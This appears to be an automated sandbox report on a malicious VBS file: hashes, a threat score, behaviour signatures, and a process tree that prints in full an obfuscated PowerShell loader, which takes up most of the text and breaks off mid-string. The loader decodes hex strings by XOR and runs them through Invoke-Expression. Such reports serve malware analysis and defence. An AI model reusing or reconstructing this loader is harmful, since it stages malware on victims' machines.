0694f9298292cb06b0eae287f24b53d2ed824c16eec54bf73f775b9e8ad2a337

Analysis

max time kernel
146s
max time network
150s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
25-05-2023 13:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

002671299.vbs
Size

1.6MB
MD5

ab9b3d4a26d471f3cab30e7b5fb1ebdd
SHA1

61b6ede9958ee0ae4a23e8c2f43da4b4c3eee69c
SHA256

0694f9298292cb06b0eae287f24b53d2ed824c16eec54bf73f775b9e8ad2a337
SHA512

9c769a40df6f6c7edec3be3065e8a3a20d7ce44e6cddcdb89de65b37ee6faeca1031a30a96a042db3054b7ce34cd9600063d1914abf29dccf77d1fe7d3acf802
SSDEEP

6144:Je05+M7U/Tk/aEaOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOM:gE2

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 50 IoCs

flow	pid	Process
4	1868	powershell.exe
5	1868	powershell.exe
6	1868	powershell.exe
7	1868	powershell.exe
8	1868	powershell.exe
9	1868	powershell.exe
11	1868	powershell.exe
12	1868	powershell.exe
13	1868	powershell.exe
14	1868	powershell.exe
15	1868	powershell.exe
16	1868	powershell.exe
17	1868	powershell.exe
18	1868	powershell.exe
19	1868	powershell.exe
20	1868	powershell.exe
21	1868	powershell.exe
22	1868	powershell.exe
23	1868	powershell.exe
24	1868	powershell.exe
25	1868	powershell.exe
26	1868	powershell.exe
27	1868	powershell.exe
28	1868	powershell.exe
29	1868	powershell.exe
30	1868	powershell.exe
31	1868	powershell.exe
32	1868	powershell.exe
33	1868	powershell.exe
34	1868	powershell.exe
35	1868	powershell.exe
36	1868	powershell.exe
37	1868	powershell.exe
38	1868	powershell.exe
39	1868	powershell.exe
40	1868	powershell.exe
41	1868	powershell.exe
42	1868	powershell.exe
43	1868	powershell.exe
44	1868	powershell.exe
45	1868	powershell.exe
46	1868	powershell.exe
47	1868	powershell.exe
48	1868	powershell.exe
49	1868	powershell.exe
50	1868	powershell.exe
51	1868	powershell.exe
52	1868	powershell.exe
53	1868	powershell.exe
54	1868	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
764	powershell.exe
1868	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	764	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 1696 wrote to memory of 656	1696	WScript.exe	27
PID 1696 wrote to memory of 656	1696	WScript.exe	27
PID 1696 wrote to memory of 656	1696	WScript.exe	27
PID 1696 wrote to memory of 1004	1696	WScript.exe	30
PID 1696 wrote to memory of 1004	1696	WScript.exe	30
PID 1696 wrote to memory of 1004	1696	WScript.exe	30
PID 1696 wrote to memory of 764	1696	WScript.exe	31
PID 1696 wrote to memory of 764	1696	WScript.exe	31
PID 1696 wrote to memory of 764	1696	WScript.exe	31
PID 764 wrote to memory of 1868	764	powershell.exe	33
PID 764 wrote to memory of 1868	764	powershell.exe	33
PID 764 wrote to memory of 1868	764	powershell.exe	33
PID 764 wrote to memory of 1868	764	powershell.exe	33

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\002671299.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c dir
  2⤵
  PID:656
- C:\Windows\System32\cmd.exe
  cmd /c dir&echo ###RSHELL.EXE###
  2⤵
  PID:1004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Misjoinam = """ FSu nOc tCiPo nR AI nMcFlS1 1 U{P B DpPaMrpaImM(P[aSdtBr i n gM] `$AW aFv eSl )G; `$SLFiVn g vPiF L=K ' 'B;R W r iPtAeF-LHeoIsbtU W`$FL iHnSg vFiL;P WdrAi tPeB-nH oss t U`$ L iKnTg v iI;N CWCr i tKe - HDo sUt E`$SL iAnHgSv i ;M K V S`$SU narTeSfFu t R=U BNHeBwL-oOVbgj ePcstS b yhtbeA[ ] V(f`$BWIa v eBlR. LseRnSgct hS U/M 2o)U; K S P VFno r (P`$SF oBr e fCf eFl =S0 ; C`$uFEo r emfBfAeTlI -Ulst C`$ WFaCv eOl .CL eInbgDtTh ; S`$FFVo r eAf fAe l +t= 2 ) { I S`$PKPo m mAaAnGd o =R `$SW aIv eBlt. SCuAbCsCtSr i nPg (I`$ F oprUe f f e lB,S U2 ) ; A M N O A `$CU nSrFeHfMuStC[ `$uFSoSrMe fSfAeFlF/D2 ] F=E [BcEoPnFvTeOr tA]F:A:ATGoRBRyRtSee( `$BK oCmUm acnOdToH, G1D6 )A;P `$SLCabsCt eMnAdLeBs 1b6 0 =E A( `$SU n r eIfSu t [ `$RF oOrHeFf f eOlN/T2p]S -BbRxPoAr I1 0U5V)R;V S `$LU nir etfWuMtL[C`$ FIo rCeCfSfUeAlO/M2R]t = Z`$RLTa sUt e nud e sg1 6O0 ;n P R S} S[ S t r i nUgR]G[ASUyFsPtUe m . TRe x tF.IEEnScBo dgi nAgX] : :FARSPCAIGI . GUeZtBS tTrDi nogM( `$ U n rSeRfAu tM) ; } `$HM a tIeJm a 0T=sITnAcFlT1E1 'S3SA 1M0C1SA 1 D 0 CA0S4 4 7I0 DW0 5 0H5R'I; `$LMFa tPeGmCaH1 = I nDc lP1 1 S'H2 4J0E0M0 AP1eBA0I6 1RAu0H6S0 FU1FD 4A7 3 EF0S0 0E7S5KA 5 B 4W7L3 Cd0 7 1HA 0N8d0AF 0MCS2 7A0U8R1 D 0 0 1UFP0TCL2U4B0SCD1ADM0U1K0K6 0DDS1PAS'u;v`$SMSa tCe mPa 2w= I nAcPlS1A1S ' 2DET0NCP1CDB3N9 1 B 0 6H0AAT2 8 0JD 0CD 1TBA0 CS1 AS1 AS'B;L`$MMbaTt eamMa 3H=mIAnMcSlL1 1B 'E3BAA1 0 1lA 1SDG0lCL0 4R4 7D3 BB1IC 0 7 1 DA0I0D0V4 0BC 4G7F2 0 0R7 1 DA0 CT1UBB0T6I1P9 3KAO0UC 1 BR1OFW0I0D0sAS0 CS1 A 4V7P2 1O0R8K0G7V0 Da0S5c0TC 3 BP0UCF0NFB'e; `$iM a tEePm aS4P= I nFcDl 1B1J 'u1MAI1 D 1pBD0 0B0 7 0DET'R;F`$UMUaStEeDmRaR5K=SICnmcFl 1W1U ' 2AE 0SCI1NDS2 4R0 6 0OD 1SCB0 5L0 Cb2 1H0e8H0B7D0JD 0 5C0 C ' ;C`$PM aCtNeNm a 6 = IDnmcDlS1U1 ' 3OB 3FD 3 A 1 9A0 CD0sAV0S0A0C8U0N5 2s7U0C8V0V4 0CCS4T5 4F9D2 1I0 0C0uD 0ECD2SBY1 0P3MA 0 0U0 EC4C5 4S9M3i9 1 C 0FB 0g5i0T0 0 A ' ; `$ MGast eTmVa 7 =sI nNcAl 1H1C E'K3SB 1 CK0 7U1 D 0f0J0U4 0BC 4H5T4V9 2A4C0F8 0 7N0 8S0PE 0 CA0SDB'U;P`$FM aTtTeTm aM8N=HI n c l 1 1 ' 3IB 0 CE0VF 0 5L0SCT0 A 1BD 0 CA0BDD2SDM0 CN0D5 0 C 0 EW0F8S1 DE0SCI'S;a`$ M aFtAetm aC9 =KI n c lT1 1H S'K2D0 0S7d2C4 0BC 0T4I0 6O1CBL1M0N2 4P0T6 0FDI1BC 0 5 0OC 'S; `$Ve h rSl 0 =RIFnUc lA1S1 ' 2N4 1 0O2PDA0 C 0B5V0UCT0sEK0T8 1kD 0BC 3 D 1 0L1 9O0 CN' ; `$ eGhOrFlD1U= IsnMcSlS1B1U ' 2aAE0S5B0 8A1IA 1UA 4E5P4 9 3 9S1 CP0 BU0F5 0F0A0CAR4 5 4C9 3BAd0ECM0g8T0 5O0CCO0ADI4U5 4f9 2M8 0K7H1EAU0 0 2JA 0 5A0S8P1 AI1OA 4D5 4 9a2 8 1VCR1 DR0 6T2 A 0S5S0 8B1 AB1 AT' ;C`$ eFh rGlW2K=FI n c lF1T1C F'D2B0 0S7S1KFT0S6G0L2 0 C 'A; `$seAhrr lT3M= IAn cVlW1R1N 'H3 9 1BC 0SB 0A5 0L0B0SAo4C5M4M9 2G1I0P0T0ID 0WCf2 B 1 0S3MAS0S0V0 EC4 5 4 9 2 7F0 CL1KEH3JAm0 5A0I6 1SD 4 5N4 9 3OFP0D0 1 B 1SD 1SC 0 8C0P5d'L;t`$ eShTrBl 4 =DI n c l 1S1 'A3PFZ0K0B1HB 1AD 1UCS0 8 0 5M2E8 0F5 0A5 0B6 0aAB' ; `$PeBhIrBlD5 = I nPc l 1 1 U'F0D7 1GD 0BDt0 5A0 5T'P; `$ e h rFlS6 = I n cRlP1T1 S'G2 7j1cD 3h9S1 BS0 6 1 DI0 Cn0 AE1BD 3VFU0 0B1AB 1SDC1 C 0S8S0 5 2G4R0 CA0D4N0S6G1 BB1 0 ' ;D`$UeUhSr l 7 =FIFn cMl 1B1I ' 2U0 2 CT3L1u'R;F`$SeGh r l 8a=AISn cLl 1S1 ' 3 5S' ; `$ SDo rDoS= I nHcFlU1T1 B' 3rC 3RA 2SCR3CBW5SAA5 BI'Z; `$BI mUmmaSnP=BIEn cAl 1D1A V' 2bA 0 8 0T5T0 5T3 EK0L0F0C7O0 DL0 6 1 E 3 9E1CB 0r6G0UAS2 8S'T; f uLn cPtWi o n OfDkVpF M{uPRaFr a m (S`$ R o mBaUn ,S K`$CMRa k aUrSoCnAiBeD)P S F L C;A`$ETIrUoSt h e dF0R = I n c lN1h1 ' 4GD 2CFV0RCS1AB 0r4Y4G9R5 4S4F9 4V1 3K2G2 8V1B9 1 9P2IDT0A6C0 4G0 8 0D0 0 7H3T4U5 3 5 3S2 A 1 C 1 BF1 BI0aC 0F7 1MD 2vD 0T6H0B4 0L8 0 0A0s7 4N7 2BE 0 C 1fDF2T8S1IAS1MAP0lCT0 4N0CB 0 5H0 0D0dC 1RAr4P1S4 0 4 9 1 5M4F9 3PE 0B1U0UC 1 BH0 CB4 4H2A6s0 Bo0 3K0RC 0LA 1rDP4L9 1 2R4 9 4 DN3 6U4L7B2LEI0O5M0Y6L0BBC0H8 0S5T2U8B1PAK1RAB0sCv0E4A0PB 0R5D1 0M2sA 0S8 0DA 0R1 0FC 4D9 4B4 2P8R0 7E0SDS4A9 4AD 3M6 4M7 2B5a0T6 0 AD0T8N1 DU0C0P0A6M0t7U4 7 3 Af1B9U0 5T0 0M1RDT4 1d4KDr0BC 0A1H1MBs0 5s5V1P4 0 3 2N4D4r5 8A3C4S4 7T2TCs1S8e1RCH0 8 0 5B1 A 4 1L4 DF2B4P0 8P1 D 0 CT0 4 0 8 5K9B4F0T4 9I1 4v4C0H4U7 2 EP0 Cm1 D 3PDP1R0R1B9 0 C 4O1M4JD 2 4E0L8C1BD 0 C 0R4 0o8F5 8 4N0 ' ;V.I(K`$oePh rSl 7 )U S`$ATlrNoPtIhNeBdl0S;S`$ T rLoLt hWeBdu5 P=C kIPnZc l 1L1V ' 4 DO2F4 0M0K0M5 0 0O4L9 5 4 4 9G4GDH2TFM0 CD1 BE0P4 4P7 2 ED0 CA1UD 2L4 0ACG1ED 0 1O0 6 0BDD4 1M4HDN2D4S0S8 1AD 0aCM0S4D0 8P5JB 4V5S4K9t3T2 3FDM1S0 1 9K0PC 3K2 3 4 3G4 4 9N2S9D4M1 4AD 2A4S0 8A1 DS0CC 0 4 0 8 5 Ak4H5r4R9 4DDN2F4A0S8 1ADB0AC 0I4 0B8t5 D 4 0H4K0 ' ;D. ( `$KeGhPr l 7 ) `$STPrno tSh eSd 5I;H`$ TVrMoGtDh e dL1B =K FIBnKcClB1i1 U'B1ABL0TCL1ADR1 C 1SB 0T7P4 9 4BDH2 4S0 0 0E5u0l0 4I7 2S0 0S7E1DFS0C6 0I2C0BC 4F1 4RDP0 7M1SCB0M5D0F5S4 5S4T9 2 9 4S1G3P2 3kAV1M0A1SAC1GDU0cC 0V4 4s7L3 BE1 CP0d7S1KDM0 0P0 4D0WC 4d7M2 0F0 7 1OD 0 CP1 BS0W6T1 9P3WAR0LCA1 BB1GFC0L0D0IA 0 CD1pAO4 7F2A1 0S8 0I7o0 D 0M5 0 C 3BBF0 Cr0AF 3A4m4t1F2F7 0 C 1 E 4O4 2I6 0 BA0G3 0NC 0OAs1 DB4F9T3 AM1 0R1LAP1MDF0LCe0B4B4 7 3ABC1 CS0U7 1SD 0 0T0s4 0 CK4L7b2K0P0G7L1ADU0RCS1TB 0B6K1E9D3MA 0 CH1AB 1FFN0 0J0 A 0GCA1 AB4 7 2 1A0S8D0E7s0 DC0E5E0 CH3 BE0OCK0PF 4 1 4T1B2A7N0FC 1 EH4f4H2P6H0 BD0S3s0BCA0 A 1 DC4U9 2r0a0 7a1TDF3 9F1 D 1 BR4 0R4 5O4R9 4M1r4SDA2IF 0 C 1 B 0 4e4S7 2UET0LC 1PDB2M4S0hC 1 D 0D1R0W6 0iDP4 1p4PDS2 4 0F8R1eD 0HC 0S4 0 8 5 Cg4 0R4 0M4 7E2 0T0 7R1 FD0b6 0T2S0DC 4 1F4PDA0s7 1PCP0U5 0K5 4T5 4 9 2C9G4G1 4FDI3VB 0 6S0U4 0U8U0A7T4 0 4S0 4 0 4 0 4b5G4P9V4 DT2T4l0 8 0 2T0 8 1HBK0 6P0E7 0 0 0FCH4L0 4 0L' ;g.J(U`$ eTh rDlM7 )C p`$GT rMoDtth eAdT1t;L} f uUnHc tAi o nL G D T L{ P aHrSaKm (O[RP aDrcaSm eKtFeDr ( P o s iAt iSoCnH T=l i0B,S MVa n dBa tHo r y T= U`$NT rIume )k]P S[KT yfpGeS[ ] ]F `$ ISlTd e rPe mM,T[FPPaPrsaFmBeJtDe r (SPUoLsRi tSi o nN B= 1 ) ] A[ T yPpCeR] L`$ GAl aCsSs lBi b e =S A[SVSo iFdH]M)L;t`$TTPrCoStLhUe dP2 = DI nVcSl 1 1t f' 4 DH2BAN0 6o0 C 0 5S0 8L1 AD1 DB1EBP4K9P5N4E4 9 3B2S2S8 1P9 1R9A2 DF0T6 0T4H0R8S0 0 0 7 3F4 5 3 5d3 2 AM1BCS1bB 1 BT0 CF0F7 1MD 2HDO0i6V0K4 0S8M0A0P0 7F4 7 2MDB0AC 0SFU0C0I0R7 0DC 2PDI1S0 0 7N0 8m0T4 0D0B0KAP2U8 1dAT1TA 0 CS0A4E0GBC0N5A1H0 4W1 4 1 2B7F0 CF1dEU4 4T2M6F0 Bt0E3 0JCE0 AB1 D 4t9M3 AB1G0U1 A 1 D 0 C 0 4F4R7H3EB 0 CD0FFJ0F5 0SCS0SAF1PD 0U0 0A6O0 7P4 7 2p8K1SAC1BAD0 CS0G4 0 BD0F5S1F0 2P7 0 8r0 4N0FC 4l1 4 D 2V4 0I8C1 D 0BC 0 4S0 8 5N1S4A0M4P0H4 5 4m9N3B2C3TAV1 0G1 AA1GDS0 C 0G4v4G7K3 BA0ACO0EF 0 5 0 CS0FAC1ID 0 0k0U6U0 7 4 7B2 C 0M4 0D0O1 D 4C7D2E8 1 AE1 A 0gC 0 4O0 Bl0K5I1 0R2SBM1FCT0d0W0 5T0QD 0 CS1 B 2P8 0CAM0 AB0 CE1IAR1tA 3N4M5 3O5b3 3MBY1 C 0u7f4U0 4 7 2SD 0ACT0DFF0U0N0 7G0PCS2SDE1E0S0D7 0d8 0 4 0 0P0TAA2S4L0T6T0BD 1RCS0S5S0KCE4F1Q4BD 2C4P0S8D1RDs0ACR0 4k0L8U5I0 4L5S4F9 4SDS0 FH0S8O0S5G1 A 0 CB4 0U4E7D2CDK0 C 0 FU0P0T0d7 0 C 3CDL1W0 1H9 0 C 4G1S4TD 0 CA0F1B1VB 0 5 5T9U4C5P4A9W4 D 0WCK0D1L1 BT0 5B5D8 4B5D4N9F3 2T3CA 1b0 1 A 1SD 0SCQ0 4M4K7A2 4A1 CM0m5 1DD 0M0L0FAD0A8 1 A 1 D 2 DO0 CA0K5P0mC 0UEU0 8 1FDT0 CM3U4O4 0A'F;S.S( `$ReCh rJl 7P) P`$WTHr oWtKhSe d 2S; `$ TorDoUt hLeBdC3C = I nSc lL1 1 R'S4 DP2BA 0S6I0LCL0P5 0F8 1BA 1TD 1 BD4R7L2 D 0CC 0TFV0 0T0 7 0WCA2 AS0M6 0f7O1 AF1OD 1UB 1nC 0FAE1LDB0D6U1HBF4C1e4 D 2 4V0 8p1CD 0PCB0L4 0b8F5SF 4T5 4S9 3T2 3PA 1J0 1SAU1WD 0 CS0S4K4V7 3HB 0aCC0 F 0 5S0 CF0PAE1 D 0C0 0 6 0 7Z4 7 2 A 0 8T0 5A0D5 0 0 0S7G0BET2 AO0P6F0 7M1 F 0CC 0 7T1 DQ0 0R0M6N0M7 1PAf3 4T5C3 5 3K3 A 1 Dm0e8 0 7B0RD 0U8j1 BR0LDP4B5H4B9 4VD 2 0R0 5S0BDM0NCC1 B 0 C 0U4 4S0O4 7D3KAd0BC 1oD 2K0 0D4R1l9 0 5O0ECS0U4 0 CI0 7 1 DD0 8F1AD 0A0D0F6A0O7 2OFT0H5R0 8 0UEF1FA 4 1 4MD 2M4T0S8H1 D 0SC 0 4 0D8 5ME 4s0 ' ; .b(S`$ eNhBr lR7H)P T`$ T r o tChpeBd 3N; `$ T r oTtUhSeAdP4R G= MISn c l 1S1B D'K4EDr2EAb0 6 0 C 0 5i0 8E1RA 1 D 1SBR4 7P2CDB0 C 0PF 0N0A0 7 0TCD2F4 0FC 1 DG0 1 0V6C0VDC4S1B4 D 0 C 0P1H1 Bk0z5 5TB 4B5 4 9 4 D 0 CR0 1R1IBH0J5S5SA 4L5T4T9K4PD 2 EO0 5 0O8R1 AI1 A 0 5 0 0N0AB 0 CP4P5 4U9 4hD 2 0 0 5P0SDA0 CB1aB 0FC 0 4 4P0 4f7o3BAG0 CB1SDA2 0A0 4S1L9 0M5T0ECu0 4S0 C 0 7M1 DM0 8d1dD 0F0T0A6 0 7 2HFS0p5 0G8O0UEB1 AJ4 1A4 DR2 4s0H8F1MD 0NCR0D4 0W8 5DEK4 0 ' ;V. (T`$ReHhRr lL7E) `$ST rHoBt hAe d 4M;P`$CTDrDoFt h e d 5 F= I nDcBlS1 1f K'F1 B 0OC 1AD 1 CE1 B 0J7 4 9U4ND 2 AK0 6 0 Cs0 5 0P8 1sA 1 DP1SB 4H7B2TAS1 BB0 C 0U8M1EDT0 CM3 DV1C0S1T9L0 C 4 1I4 0B' ;C. ( `$Ae hDrLlM7 )D `$ TTrRo t hRePdB5F ;T} `$AI nSd uC N=L FI nScUlM1G1g A'K0 2 0CCC1BBS0G7 0IC 0i5B5LA 5MBM'T;F`$ I nUc lT0S3 M=R I n cfl 1C1P F'B2SEM0HCN1CDS2 AS0T6B0J7B1 AB0 6A0T5D0SC 3 E 0 0 0 7E0 DV0 6C1GE 'H;O`$ I nBcUl 0D0 =yI n cKlB1C1W 'G3SAH0 1 0L6R1 ET3EEH0a0 0O7c0TDF0K6C1DEK'V;S`$DI n cil 0S1S =A IOn cClV1a1E P'G4 D 2NBO0 0F1PAM1FD 0S8 1PDK0RC 0 0 5TB 5 DU5M8P4B9H5L4 4P9k3g2 3SA 1A0B1AAP1 DD0bCE0P4 4O7 3 B 1 CL0H7S1 DN0 0U0R4 0SCT4 7S2 0E0 7O1 D 0 CN1 B 0T6r1 9v3 A 0NCA1MBA1LFA0R0 0BAP0BCS1OAS4L7V2P4 0 8 1DBE1CA 0 1s0S8 0 5 3S4 5N3A5D3S2BEA0 CB1FD 2BDB0 C 0 5 0 CD0FEH0A8M1VDR0VC 2AFA0 6F1FBA2HFF1SCU0L7F0iA 1AD 0F0S0 6 0A7B3 9 0 6 0 0R0C7 1SD 0SCB1 BE4P1 4 1A0 F 0 2G1S9i4F9D4 DF3 AS0L6F1 BF0E6A4R9 4VD 2B0S0I7R0bAD0I5O5 9 5 9 4C0D4 5N4 9 4g1 2HEF2 D 3 DD4 9S2S9C4O1G3U2C2H0T0 7 1CD 3B9 1 D 1 BR3S4 4G5l4S9 3V2 3LCU2S0 0 7 1TD 5GAs5 BP3R4e4U0B4U9l4 1 3 2F2M0 0H7S1HD 3V9 1CDr1 B 3S4B4T0 4 0 4p0R'G; .B( `$ eBh rBlS7 )P P`$ IEnDcSlD0O1S;D`$ I n c lF0L2L T= eI nEcCl 1A1 S'E4LD 2 8 1B9 0 8U1BDR0f8S4 9 5 4 4 9c3F2 3HA 1B0A1KAe1 D 0 CF0k4r4S7C3fBg1HC 0 7 1RDR0 0 0 4N0XCO4S7 2S0T0 7P1 DJ0BCB1 B 0A6 1P9P3VAI0 CH1CBV1dF 0I0 0 AD0WCB1 AU4 7 2 4Y0 8 1CBC1 AA0e1 0K8 0 5M3H4 5 3 5 3A2 EI0FC 1ZDA2 D 0OCS0G5 0 C 0SE 0S8 1NDK0 CV2 F 0S6 1GBS2SF 1SC 0a7 0 AA1HDL0 0H0F6 0P7U3C9 0B6M0S0W0W7D1EDD0NCV1BBO4P1M4N1 0 Fk0G2C1 9A4F9 4 DS2 0 0 7 0 DB1 CB4 9 4AD 2M0S0B7T0EAF0C5 5 9R5AAA4F0U4S5H4 9J4S1A2 EU2CD 3hD 4T9 2C9P4B1 3 2R2 0D0 7o1BDm3A9C1FD 1 BP3K4 4k0 4 9B4N1 3t2L2B0T0F7O1DD 3B9 1 DH1 BR3 4G4S0 4S0 4 0B'C; .V( `$Be hKr l 7M)p F`$RI n cRlC0U2U;U`$ TRrKodtAhSe dA7 =B AITnIcMlM1T1 R'N4GDS3 DF0 0 1S9 0 6C4L9 5B4 4 9 4 DT2A8 1U9C0A8 1PD 0D8E4p7p2O0i0 7S1 FB0 6H0 2 0 CT4 1 5 9S4 0 'A; . (S`$Oe h r lM7S)G `$FTOrDoDtPhGeJdS7P;U`$ST r oUtAhBead 7s S=S I nUcBlV1L1T 'F4 DB2aB 0G0A1kA 1BD 0D8M1 DF0 C 0S0R5DB 5SDM5F8L4O7O2F0 0A7e1lFG0B6 0L2 0KC 4p1S4FDL3CDU0E0 1H9 0p6S4U5U4 9 5M9C4M0 'S; .B(C`$Me h rUl 7V)P `$UT rHoPt hBeFd 7 ; `$ TSrToRt hIeFd 6 =P KIAn cBlH1K1C U'T4FD 0 0B0S7H0oDB0AFB0 3S0 CT1 D 4C9S5M4 4 9T3P2 3UAK1 0T1SA 1 D 0 CE0S4 4 7V3EB 1DCR0N7K1TDV0S0 0 4S0TC 4u7 2H0D0 7 1 D 0 CF1GBD0G6 1B9 3nAD0SCS1LB 1 FS0O0 0TAM0BCi1 AP4 7S2K4 0D8 1 B 1 Ae0T1 0P8S0M5v3I4B5E3t5 3P2oE 0 CC1 DN2 DL0 Cu0 5M0HCS0 ET0a8B1 D 0vCO2 FB0C6 1MBU2uFA1 C 0K7 0SAI1KDN0C0 0 6u0 7 3 9m0c6U0 0B0B7S1KD 0 CD1KBN4T1 4 1 0LF 0T2 1 9 4 9c4uD 2 0 0 7 0 Dt1uC 4S9 4AD 0MCG0 1 1iB 0 5M5pDg4A0E4s5B4T9B4 1F2 E 2 D 3CDR4 9O2O9S4 1S3C2 2S0 0P7 1HDL3S9 1BD 1 BS3E4 4P5 4S9J3R2K3SC 2 0 0 7m1PDR5TA 5 B 3S4B4 5A4K9B3 2 3FCP2 0p0U7R1 DH5MAG5 BE3D4c4E5 4c9R3 2 3 C 2f0T0D7 1MD 5PAG5PBd3K4 4C0T4 9 4B1D3H2G2G0B0S7K1 D 3F9N1 DU1 Bb3 4S4 0D4 0B4H0 ' ; . (A`$ eBh rTlF7A) `$STBr oIt hPe dT6P; `$GP s yPcA S=M fPk pO C`$DeEhsrNlI5P B`$PeihSrPl 6 ; `$BTNrEoKtNhGendP7C =F UIRnFc lG1D1 's4 D 3I9 0G8 1VF 0SC 0 2C0 0B1TBD0 2 0SC 0 7j5KAC4D9 5H4 4S9H4SD 0G0V0p7S0SDU0 FD0A3A0 Ck1GD 4 7A2S0 0A7C1nFF0A6 0R2G0FC 4 1F3H2K2m0T0G7 1DDS3 9 1 D 1CBM3S4R5B3 5R3 3 3U0 CS1BBG0M6S4 5K4r9 5FF 5SC 5GFR4M5 4B9R5S9S1 1c5 AL5m9 5 9 5N9B4 5B4g9F5T9 1L1b5BDA5B9C4F0 ' ; .G(V`$IeKh rSl 7 )S F`$ TSrSoRt h e d 7P;H`$PTEr o tAhAe d 8 = IGnOcBl 1 1 O' 4UD 3 EU0 1Z0 CE1SBA0 Cv0PFU4 9T5 4v4 9V4RD 0T0I0G7 0FDA0 FC0M3 0 CV1ADK4S7F2 0s0R7 1 F 0S6 0g2P0aC 4M1D3 2P2 0S0S7K1MDW3D9 1PDE1 BC3S4T5 3T5 3 3 3t0 CH1SB 0S6H4N5T4 9B5 BC5 8 5 8 5T1R5 1f5 FA5D9 5r1 4 5 4 9N5U9S1S1B5 A 5S9 5m9 5U9K4Y5K4F9b5 9c1 1O5 D 4E0 ' ;B.K(h`$ e hRrTl 7 ) K`$BTerSo t hAeSd 8 ; `$ Idn cVlS0 1F N=E DI nUc l 1 1D K' 0C1 1ADP1EDB1 9 1 Ao5 3 4 6K4I6C1E8 1FC 0P0C0 AA0 2 0SA 0K1F0 CI0BAS0P2E1 1A4K7U0MEO0 0 1 DK0 1 1UC 0HBB4 7F0 0P0 6U4N6E1S8 1HCP0 0R0 A 0S2A0 4 0ACk4U6B3 CR0 DN0 ES0 8v0S7B4S7 1VCB5DA 5TBF' ;m`$ IKn cUlP0P0S T= I nKc lS1G1 S'F4 D 3sA 1O9s0E1o0fC 1 BH0P6P0L4 4t9 5K4G4L9e4L1T2C7N0 CR1 Eh4S4 2 6r0 BD0K3 0CC 0 AG1RDK4M9O2B7D0 C 1OD 4P7L3 E 0 CB0 BL2 AA0P5U0 0 0BCU0P7 1BDU4R0U4A7S2FDA0 6O1IEU0 7X0W5 0S6Z0 8F0PDS3 AS1 D 1IBP0b0E0 7 0UEK4B1P4PD 2 0 0K7 0RAD0P5 5M9A5 8S4 0r' ; `$TTMr o t hDeVd 8H E= I ndc lM1Y1U M'F4BDB3U9 0B8A1KFP0AC 0A2a0B0S1EB 0B2S0LC 0 7T5 BH5p4S4 DD0DC 0 7S1AFL5 3U0T8O1P9 1S9 0KDM0O8 1lD 0V8 ' ;A. (C`$GePhKr lO7E)V A`$FTTr oVtShSe d 8z; `$FPPaHvIeNk i rSk e n 2D=U`$WP aFvAeJkRiMr k eBnM2 +I'K\TSepAass . u r f 'A;L`$ S pLhUe rPoVmG=s'S'I;Pinf S( -Pn oKt ( T e stt -SPAaHtEh `$ P a vce k i r kPe nT2 ) ) {uwShPiIlPe T( `$ SPpKhAe r oPmG F-VeAq R' 'n)n k{A.H( `$eeShCrPl 7I)G V`$AI n c lE0T0 ; SdtCaNr tR-SS lCeMeEpN 5C;n} SKeTt -sC oEn t egn t A`$LPPaCvOe kSiTrTkkepns2H `$DSNpChDeMrVo m ;N} `$ SRp h eUrCo mS = GTe te-SCMoOnFtCeFnst E`$LPRa v egkfiFr kPeon 2 ;S`$ T rOoFtPh eSdF9S =S IAnUc lB1A1B O'L4 D 3 DD1TB 0 6C1CD 0P1M0CCB0PDT4H9H5S4A4F9s3g2B3PA 1H0 1 A 1ADU0 CC0 4V4H7 2UAF0T6 0G7 1IFH0PC 1RBN1PDS3 4C5N3 5A3 2AFN1EB 0A6U0Z4E2HB 0 8C1rAR0 CA5AFP5cDC3 A 1 DS1 BR0B0F0D7A0REB4 1 4UD 3DA 1 9 0 1 0 CW1VB 0E6 0P4R4I0 'P; . ( `$ eFh r lE7 ) `$ TtrPo tEh e dF9V;S`$FS pDh e rEo mD0 B=O IMn cElH1K1S 'M3G2 3TAT1B0G1 A 1KDP0PC 0S4R4S7S3 BU1 CP0O7P1 D 0 0T0 4B0TCB4A7S2 0U0 7V1 D 0FCu1WBB0s6D1 9O3 AA0 C 1MB 1 Fe0 0R0KAO0RCP1 AY4 7 2 4 0S8 1PBN1BAA0M1V0V8K0 5 3 4I5 3 5 3K2MAU0 6R1U9A1S0 4N1B4 D 3MDS1BB 0m6 1 D 0 1 0RC 0LDe4E5 4T9L5B9P4C5I4M9 4S9 4VDP3K9L0 8E1HF 0 C 0R2M0 0m1LBB0r2 0SCP0 7 5SA 4U5 4 9 5JFH5 C 5AF 4U0 ' ;M.S( `$ eDhBrSl 7 )e `$PSTpAh e rPoTmB0V; `$SM aGg nY= `$UTJrFo tSh eLd .Dc olu nAts- 6U5 6D;S`$ZS p hde r o mc1 K=t IKn c lA1 1P H' 3M2 3 A 1 0 1 AM1 D 0SC 0L4 4 7 3JB 1SCB0R7F1ADC0I0 0 4P0 CE4f7 2F0E0 7A1 DE0 CM1PBM0C6 1H9B3TA 0OCH1 B 1 F 0U0S0MAO0pC 1LAf4S7B2O4 0S8 1rBF1MAS0 1B0 8 0 5 3F4 5A3 5C3r2 AS0t6D1S9 1a0p4 1A4ADA3FD 1 BP0P6 1BDG0 1B0uC 0oDI4S5 4 9C5PFH5KC 5 FR4S5 4S9 4SDD3 EK0 1K0 Cl1 BM0KCD0IFI4B5E4R9K4eD 2S4H0 8U0 E 0P7 4O0E' ;E. ( `$Fe hKrTlN7M)p S`$ASUpPhFe rBo mM1 ;O`$ S pMhsePrZo mV2L G= BIGn c l 1R1S 'A4HDT2S1F1S0I0 DP1UB 0M6M1 9M0L1S4D9 5 4E4 